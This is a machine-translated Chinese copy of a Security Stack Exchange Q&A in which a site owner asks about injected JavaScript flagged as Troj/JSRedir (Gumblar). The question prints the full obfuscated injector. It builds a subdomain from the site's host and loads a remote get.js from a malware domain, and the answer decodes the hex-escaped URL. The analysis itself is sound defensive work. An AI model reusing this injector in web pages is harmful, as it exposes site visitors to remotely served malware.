恶意JavaScript -- Troj/JSRedir - Gumblar
恶意JavaScript -- Troj/JSRedir - Gumblar
提问于 2014-10-17 18:21:09
我有一个客户端与一个网站接收来自微软安全要点的AV警告。进一步的调查显示,该网站被Yandex.com列入黑名单,原因是有报道称该网站包含恶意javascript。具体而言: Troj/JSRedir-HP (Gumblar)
我已经从他的网站上删除了这个代码,因为它位于收到警告的页面上。此时,我们不知道这是否是外部注入,或者可能是他的web开发人员插入的合法代码。
对这可能会做什么有什么想法吗?
<script type="text/javascript" language="javascript">
document.write('<' + 'script type="text/javascript" language="javascript" id="aoc262540n"></' + 'script>');
var j = document.getElementById("aoc262540n");
var s = document.location.host;
var s1 = "";
var qcl2q = 10;
for (var i = 0; i < s.length; i++) {
var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q;
r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57);
s1 += String.fromCharCode(r8j8tnwtk76gj);
qcl2q = s.charCodeAt(i);
}
s1 = s1.replace(/[^a-zA-Z0-9]/g, "");
if (document.cookie.indexOf("google_api=1;") == -1) {
j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";
}
delete s;
delete s1;
</script>回答 1
Security用户
回答已采纳
发布于 2014-10-17 18:39:44
j.src = "\x68\x74t\x70\x3a\x2f\x2f" + s1 + ".\x70\x65\x67\x75\x61r\x64\x73.cc\x2f\x38\x39d\x38\x31\x6207iq\x2f\x67\x65\x74.\x6a\x73";上面的行试图创建一个URL。
对于http://security.stackexchange.com/,它创建
http://LnnDqsJvpDkZdfsqaekbbhr.peguards.cc/89d81b07iq/get.js然后,它将此URL写入网站,以便在用户单击该URL时将用户重定向到该URL。这个网站看起来像一个恶意软件网站。
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/70998
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号